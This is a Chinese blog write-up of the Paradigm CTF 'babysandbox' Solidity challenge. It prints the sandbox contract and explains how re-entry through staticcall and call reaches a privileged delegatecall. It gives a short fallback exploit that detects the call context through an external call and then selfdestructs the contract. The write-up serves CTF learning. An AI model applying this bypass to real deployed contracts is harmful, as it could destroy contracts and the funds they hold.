【CTF】paradigm-CTF babysandbox

已于 2024-01-19 19:27:39 修改
阅读量241 收藏
点赞数
文章标签: 区块链 网络安全
于 2023-01-05 15:41:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A_991128a/article/details/128564405
版权
文章介绍了CTF比赛中的一个合约安全挑战,涉及Solidity编写的BabySandbox合约,讨论了如何通过理解delegatecall、staticcall和call的用法,以及如何利用重入攻击来解决挑战,最终实现合约的自毁。解决方案包括在外部合约中设置方法,通过内部call请求来区分调用类型。
摘要由CSDN通过智能技术生成

【CTF】paradigm-CTF babysandbox

前言:找Ver👴想复现下qwb final的区块链。Ver👴给我发了这个比赛下面的一道题,发现这个比赛里面有很多高质量的智能合约题。从这里开始写一些不错的题目。

babysandbox

看到题目名字就知道了题目考点: 沙盒给出合约BabySandbox.sol

pragma solidity 0.7.0;

contract BabySandbox {function run(address code) external payable {assembly {// if we're calling ourselves, perform the privileged delegatecallif eq(caller(), address()) {switch delegatecall(gas(), code, 0x00, 0x00, 0x00, 0x00)case 0 {returndatacopy(0x00, 0x00, returndatasize())revert(0x00, returndatasize())}case 1 {returndatacopy(0x00, 0x00, returndatasize())return(0x00, returndatasize())}}// ensure enough gasif lt(gas(), 0xf000) {revert(0x00, 0x00)}// load calldatacalldatacopy(0x00, 0x00, calldatasize())// run using staticcall// if this fails, then the code is malicious because it tried to change stateif iszero(staticcall(0x4000, address(), 0, calldatasize(), 0, 0)) {revert(0x00, 0x00)}// if we got here, the code wasn't malicious// run without staticcall since it's safeswitch call(0x4000, address(), 0, 0, calldatasize(), 0, 0)case 0 {returndatacopy(0x00, 0x00, returndatasize())// revert(0x00, returndatasize())}case 1 {returndatacopy(0x00, 0x00, returndatasize())return(0x00, returndatasize())}}}
}

Setup.sol

pragma solidity 0.7.0;

import "./BabySandbox.sol";

contract Setup {BabySandbox public sandbox;constructor() {sandbox = new BabySandbox();}function isSolved() public view returns (bool) {uint size;assembly {size := extcodesize(sload(sandbox.slot))}return size == 0;}
}

Setup.py中的isSolved()进行了是否成功解决challenge的check.

这里我不是很熟悉.slot这种用法,所以自己随便部署了一个进行试验。

应该就是取了题目合约的整个字节码。要求把合约变成一个账户。或者直接让合约自毁应该也可以。然后我们分析下Sandbox中的各种方法

 if eq(caller(), address()) {switch delegatecall(gas(), code, 0x00, 0x00, 0x00, 0x00)case 0 {returndatacopy(0x00, 0x00, returndatasize())revert(0x00, returndatasize())}case 1 {returndatacopy(0x00, 0x00, returndatasize())return(0x00, returndatasize())}}

这里说的是如果caller也就是调用者是自己的话。那么就会直接调用。delegatecall,也就是如果这里能设置出一些东西那么就可以成功改变合约状态了。

 if lt(gas(), 0xf000) {revert(0x00, 0x00)}// load calldatacalldatacopy(0x00, 0x00, calldatasize())// run using staticcall// if this fails, then the code is malicious because it tried to change stateif iszero(staticcall(0x4000, address(), 0, calldatasize(), 0, 0)) {revert(0x00, 0x00)}// if we got here, the code wasn't malicious// run without staticcall since it's safeswitch call(0x4000, address(), 0, 0, calldatasize(), 0, 0)case 0 {returndatacopy(0x00, 0x00, returndatasize())// revert(0x00, returndatasize())}case 1 {returndatacopy(0x00, 0x00, returndatasize())return(0x00, returndatasize())}}

第一行检测了gas是否够用,然后calldatacopy从调用数据的位置 f 的拷贝 s 个字节到内存的位置 t之后他就会利用staticall继续进行检测,但是我们可以发现,他从这里进入的staticcall 是进入了 自己的合约。 相当于对自己进行了一次重入。重入之后的调用方,就是msg.sender了。也就是可以正常进入delegatecall了。但是他利用的是staticcall在外层,所以还是不能改变合约的原有状态。

但是通过之后 他利用call进行了第二次的合约使用。也就是这里的delegatecall就可以完成任何想做的事情了。也就是我们想要的合约销毁。

那么到这里 整体的思路就很清晰了:

1.首先进入run(address target)中,delegatecall无法进入,进入staticcall
2.staticall中进入delegatecall 完成一次调用。
3.call中进入delegatecall完成一次调用。
4.需要一个函数在staticcall中不改变合约状态,在call中改变。
5.delegatecall的target只需要直接selfdestruct就可以了。

那么现在就考虑怎么给出一个办法,使得两次调用所执行的方法不同?尝试思路:

1.我们考虑到利用全局变量进行赋值。但是可想而知这个方法并不可靠。因为我们是需要staticall通过检测的,全局变量赋值还是改变了合约的原有状态。function()payable external{ if(success==true){ selfdestruct(msg.sender); } else{ success=true; }} 也就是利用类似上述的伪代码。这里是不可做的。2.利用特征进行判断。但是我们可以看到每次进行交易不管是传的gas还是什么所有的call和staticall中的特征都完全相同。 所以这个方法也很难进行bypass。```
if(gas>value){
return ;
}
else{
selfdestruct(msg.sender);
}


考虑使用call外部变量进行改变,这种是可行的一个办法。我们可以通过在外部合约设置一个方法 我们利用内部的call方法进行请求,如果能正确返回状态值则代表当前状态就是call了。

因为外部Call方法的状态即使revert()他也会只返回一个状态码0,并不会直接阻断整个交易的正常运行。

fallback()external payable{bool success;(success,)=address(0x3c725134d74D5c45B4E4ABd2e5e2a109b5541288).call(“”);if(!success){return;}else{selfdestruct(address(0));}}


<img src="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/7f79210fef914321bf433e5d071f2100~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image" style="margin: auto" />

这样就成功绕过了沙箱

这个是从github的官方wp中学到的 ,感觉应该和3的意思相同? 用等同于python的语法try catch 这样可以直接避免直接revert()

contract Setup {
BabySandbox public sandbox;

constructor() { sandbox = new BabySandbox();
}

function isSolved() public view returns (bool) { uint size; assembly { size := extcodesize(sload(sandbox.slot)) } return size == 0;
}
}


学到了很多opcode以及call staticcall delegatecall的知识。
教IT的小王A
关注
BUUCTF-PWN-pwnable_asm-Sandbox
Rt1Text的博客
07-21 305
检查允许的系统调用orw是允许的,用open()打开flag文件,通过read()和write()读取并输出。
ctf php沙箱,Python 沙盒
weixin_42631411的博客
03-16 498
Python 沙盒¶所谓的 Python 沙盒,即以一定的方法模拟 Python 终端,实现用户对 Python 的使用。Python 沙箱逃逸的一些方法¶我们通常所说的 Python 沙箱逃逸就是绕过模拟的 Python 终端,最终实现命令执行。导入模块¶在 Python 的内建函数中,有一些函数可以帮助我们实现任意命令执行:os.system() os.popen()commands.gets...
zctf-2017-pwn-sandbox
weixin_30907935的博客
03-12 500
才接触二进制不久,第一次写博客,萌新一只,zctf被表哥们虐得体无完肤,只能坐等writeup,最近参考flappypig的writeup研究sandbox这道题目,用了三天,记录一下。 ps:基础太渣,可能有理解错误的地方,大佬莫笑,麻烦大佬在评论中指出。。。 接下来进入正题 这道题有两个二进制文件:sandbox和vul。用sandbox运行vul程序,其中vul程序存在栈溢出...
09.08|Crypto Tech Night 第十七期:Paradigm CTF
Conflux的博客
09-06 272
9月8日(本周四)19:30,CTN#17 超硬核分享来袭!Paradigm CTF,被称为最高级别的网络信息安全赛事,每年聚集全球范围内最优秀的Solidity hackers和行业专家。本次CTN以该赛事为主题,与大家分享CTF2022比赛的题目与解析。欢迎各位Solidity开发者和爱好者们参与讨论~活动地点:腾讯会议????活动前群内公布会议链接,扫描下方海报二维码回复“CTN17”入群预祝各位...
ctf-all-in-one
01-30
ctf-all-in-one
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF指南-常规的CTF题目解析.pptx
10-12
CTF指南-常规的CTF题目解析
CTFTools-v1.3.7 所有古典密码与现代密码解码与编码与一身
最新发布
06-14
CTF-Tools是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码 本工具是所有MISC集于一身的解密加密工具 古典密码: 1.Affine(仿射加密) 2.Bacon(培根加密) 3.Brainfuck 4.Caesar(凯撒加密)...
PL-400 Microsoft Power Platform Developer:开启你的低代码开发之旅
gitblog_00055的博客
06-11 231
PL-400 Microsoft Power Platform Developer:开启你的低代码开发之旅 PL-400_Microsoft-Power-Platform-Developer 项目地址: https://gitcode.com/gh_mirror...
CTF-PWN-沙箱逃脱-【seccomp和prtcl-1】
llovewuzhengzi的博客
01-08 1464
code为0x20是BDF_LD(0x00)|BDF_ABS(0X20)|BOF_W的结果,就是将一个字的值通过固定偏移量复制到累加器中,此时k对应为偏移量4,即seccomp_data偏移量为4的位置正好是arch的结构。此时code 15是BPF_JMP(0x05)|BPF_JEQ(0x10)的结果,此时是相等跳转指令,相等则跳转到下一条指令,不相等则跳转到下条指令+0x19的位置,将累加器与k的值做对比,此时累加器的值是之前取的arch。,但每个头文件的这个“标识”都应该是唯一的。
[CTFTraining] BUUCTF 2018 在线工具
ZXW_NUDT的博客
06-05 1709
[CTFTraining] BUUCTF 2018 在线工具
CTF中智能合约部署交互基础
CTF小白的博客
02-14 4518
0x01 前言 Solidity在以太坊中是编写智能合约最受欢迎的语言,一般的CTF竞赛中的智能合约方向的题目都是以solidity语言编写的智能合约。 为什么写这一篇文章,主要是因为在接触智能合约类题目的时候,题目是以提前编写好的代码逻辑存在缺陷或者合约本身存在的问题为考点的,其实题目对于新手而言,难点主要在于solidity语法的陌生,以及完全无法着手智能合约,无法与之交互。所以在接下来的文...
探索高效云端消息处理:阿里云MNS Java SDK深度解析
gitblog_00027的博客
04-17 479
探索高效云端消息处理:阿里云MNS Java SDK深度解析 aliyun-mns-java-sdk 项目地址: https://gitcode.com/gh_mirrors/al/aliyun-mns-java-sdk ...
BUUCTF之[HITCON 2017]SSRFme详解
m0_62107966的博客
09-09 811
BUUCTF之[HITCON 2017]SSRFme详解 $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);//题目提供了沙盒目录,目录名就是sandbox , 给了沙盒目录, $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);//题目提供了沙盒目录,目录名就是sandbox ,md5是将(orangeip地址)这个整体进行加密。,注意中间不能有空格!
渗透学习-CTF篇-web-ctfhub
qq_43696276的博客
09-29 1787
随着学习的不断深入,为了防止自己忘记之前所学的内容,于是我决定再不断的向下学习的同时做一些ctf的题来唤醒自己的记忆!!
一天一道ctf 第54天(GET open任意执行漏洞)
scrawman的博客
08-16 408
[HITCON 2017]SSRFme <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_ADDR"]; $s
命令注入突破长度限制 | 从CTF题目讲起
纸房子
12-03 7155
在命令注入中往往会存在注入命令的长度过短的情况,无法将全部命令完全的输入进去,这种情况下就需要我们来想办法突破系统命令长度的限制。我们从三道CTF题目来讲解一下这种渗透策略。一.BabyfirstSovled: 33 / 969 Difficulty: ★★ Tag: WhiteBox, PHP, Command InjectionIdeaUse NewLine to bypass regula
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值